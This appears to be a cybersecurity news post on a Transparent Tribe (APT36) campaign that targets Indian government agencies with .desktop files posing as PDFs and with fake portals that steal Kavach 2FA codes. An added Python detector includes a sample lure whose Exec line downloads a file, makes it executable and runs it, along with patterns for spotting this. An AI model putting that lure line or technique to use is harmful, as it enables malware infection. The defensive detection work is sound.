A major cyberattack has recently been uncovered targeting Indian government agencies. The operation has been linked to Transparent Tribe, also known as APT36, a Pakistan-based hacking group that has repeatedly carried out espionage against India. In this campaign, the hackers are sending phishing emails containing weaponized shortcut files that look like PDF documents but actually install malware.
The attack is dangerous because it targets both Windows systems and India’s BOSS Linux platform, which is widely used in government departments. On Linux, the attackers abuse “.desktop” files, which normally serve as simple application launchers but are here misused to run harmful scripts. By disguising them as documents, the hackers make victims easy to trick.
Once a victim clicks on one of these files, the malicious chain begins. The file downloads a hidden payload from attacker servers or from Google Drive and saves it as an ELF binary on the computer. To avoid suspicion, the victim sees a decoy PDF open, while the malware quietly installs itself in the background.
The payload, written in Go, is designed to connect to command-and-control servers operated by the attackers. Through this connection, the hackers can send further instructions, add more tools, and steal sensitive information. To make sure it remains active even after a reboot, the malware sets up persistence using cron jobs on Linux systems.
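As an added defensive example (not code from the article or from any of the research it cites): a small Python heuristic that flags .desktop launchers which present themselves as documents while their Exec line downloads and runs something, the pattern described above. The heuristics are my own assumptions about what such a lure looks like, and the sample launcher, its file names and its Google Drive URL are constructed placeholders rather than real campaign artefacts.

```python
import configparser
import re

# Name/Icon values that make a launcher look like a document rather than an app.
DOC_HINTS = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\b|pdf|document", re.I)
# Exec behaviours a "document" launcher has no business performing.
RISKY_EXEC = [
    (re.compile(r"\b(curl|wget)\b"), "Exec downloads content"),
    (re.compile(r"drive\.google\.com|docs\.google\.com"), "Exec fetches from Google Drive"),
    (re.compile(r"chmod\s+(\+x|[0-7]*7)"), "Exec marks a file executable"),
    (re.compile(r"\b(ba)?sh\s+-c\b"), "Exec runs an inline shell command"),
    (re.compile(r"\bcrontab\b|/etc/cron"), "Exec touches cron (persistence)"),
]

def analyse_desktop(text: str) -> dict:
    """Return a verdict plus the indicators found for one .desktop file's text."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # .desktop keys are case-sensitive (Exec, not exec)
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return {"verdict": "not-a-desktop-entry", "looks_like_document": False, "reasons": []}
    entry = cp["Desktop Entry"]
    cmd = entry.get("Exec", "")
    reasons = [why for pat, why in RISKY_EXEC if pat.search(cmd)]
    looks_like_doc = any(DOC_HINTS.search(entry.get(k, "")) for k in ("Name", "Icon"))
    if reasons and entry.get("Terminal", "false").lower() == "false":
        reasons.append("Terminal=false keeps the command window hidden from the user")
    if looks_like_doc and reasons:
        verdict = "suspicious"  # document lure wired to download-and-run logic
    elif reasons:
        verdict = "review"      # odd for an app launcher, but not disguised as a document
    else:
        verdict = "benign"
    return {"verdict": verdict, "looks_like_document": looks_like_doc, "reasons": reasons}

# Constructed samples (not real campaign artefacts): a lure modelled on the behaviour
# described in the article, and an ordinary editor launcher for contrast.
LURE = """[Desktop Entry]
Name=Circular_2025.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "wget -q https://drive.google.com/uc?id=PLACEHOLDER -O /tmp/.u; chmod +x /tmp/.u; /tmp/.u"
"""
BENIGN = """[Desktop Entry]
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
"""
```

Running `analyse_desktop` over every `.desktop` file found in user Downloads or mail attachment folders gives a quick triage signal; a "suspicious" verdict on a file that also arrived inside an archive is worth an incident-response look.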
Researchers have identified domains used in this campaign, such as securestore[.]cv for staging and modgovindia[.]space:4000 for communication. In another campaign documented by CloudSEK, malicious archives carried disguised “.desktop” files that downloaded payloads from Google Drive and contacted servers like seemysitelive[.]store over WebSockets on port 8080. These findings show the attackers’ detailed planning.
Along with malware infections, the hackers are also carrying out credential theft operations. They are hosting fake login pages that look exactly like Indian government portals. These sites ask users to enter their email ID, then their password, and finally their Kavach two-factor authentication code. This allows attackers to bypass security even if 2FA is enabled.
Stealing Kavach codes has become a regular tactic for Transparent Tribe. Researchers have observed them using this trick since at least 2022, and the method remains active today. By combining password theft with 2FA code capture, the group can completely compromise sensitive government accounts and gain long-term access to critical systems.
Transparent Tribe is widely believed to be backed by Pakistan and has been active for years. The group mainly focuses on Indian government, defense, and critical infrastructure targets. Its techniques usually involve phishing emails, malware, and fake infrastructure. Recent research has also linked them with the Poseidon backdoor, showing they continue to evolve their tools.
The focus on both Windows and BOSS Linux users highlights the attackers’ awareness of India’s digital environment. By tailoring their operations to the platforms most commonly used by Indian government offices, Transparent Tribe significantly increases the success rate of its campaigns. This shows a dangerous level of preparation and intent behind their operations.
Overall, the latest attacks prove that even files and websites that look completely normal can be dangerous. A shortcut disguised as a PDF or a portal that looks identical to an official site can both be used to trick users. The campaign shows why strong cyber awareness, technical defenses, and careful use of Kavach are crucial to defending Indian government networks against Transparent Tribe’s ongoing espionage.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news